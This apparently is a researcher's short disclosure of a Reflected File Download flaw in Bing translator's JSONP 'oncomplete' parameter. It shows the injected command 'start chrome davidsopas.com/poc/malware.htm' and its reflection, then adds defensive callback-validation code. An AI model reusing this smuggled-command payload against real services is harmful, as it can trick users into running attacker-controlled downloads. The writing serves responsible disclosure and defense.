When using the Bing online translator, I noticed an XHR request in my browser that caught my attention:

[code lang="html"]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499[/code]

This was reflected on the screen as:

[code lang="html"]jQuery111207287312552798539_1444907172498();[/code]

As a security researcher, I always try to find different ways to bypass security, especially related to Reflected File Download. So I tried to inject an RFD vector into the “oncomplete” parameter:

[code lang="html"]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm[/code]

This was reflected on the screen as:

[code lang="html"]start chrome davidsopas.com/poc/malware.htm();[/code]

Using the HTML5 download attribute, I was able to send a security report to Microsoft, which they fixed within a month.

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the fourth time.
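One way a server can handle a JSONP callback parameter such as “oncomplete” so that the value shown above is rejected instead of reflected. This is an added example, not code from the original post and not Microsoft's actual fix; the function names, the length limit and the choice of headers are assumptions.

```javascript
// Added example: server-side handling of a JSONP callback parameter.
// isSafeCallback / buildJsonpResponse are hypothetical names for illustration.

// Accept only dotted JavaScript identifiers (e.g. jQuery1112_1444907172498, app.cb).
// Spaces, slashes, quotes, pipes and other shell metacharacters never match.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;
const MAX_CALLBACK_LEN = 128; // assumed limit

function isSafeCallback(name) {
  return typeof name === "string" &&
    name.length > 0 && name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

function buildJsonpResponse(callback, data) {
  if (!isSafeCallback(callback)) {
    // Reject without echoing the supplied value back in the body.
    return {
      status: 400,
      headers: { "Content-Type": "text/plain; charset=utf-8",
                 "X-Content-Type-Options": "nosniff" },
      body: "invalid callback",
    };
  }
  // Escape characters that are valid in JSON but risky inside script or HTML.
  const json = JSON.stringify(data)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
      // Fixed filename: if the response is saved, its name and extension
      // do not come from the URL or from a link's download attribute.
      "Content-Disposition": 'attachment; filename="f.txt"',
    },
    // Leading comment so request-controlled text never starts the response.
    body: `/**/${callback}(${json});`,
  };
}
```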
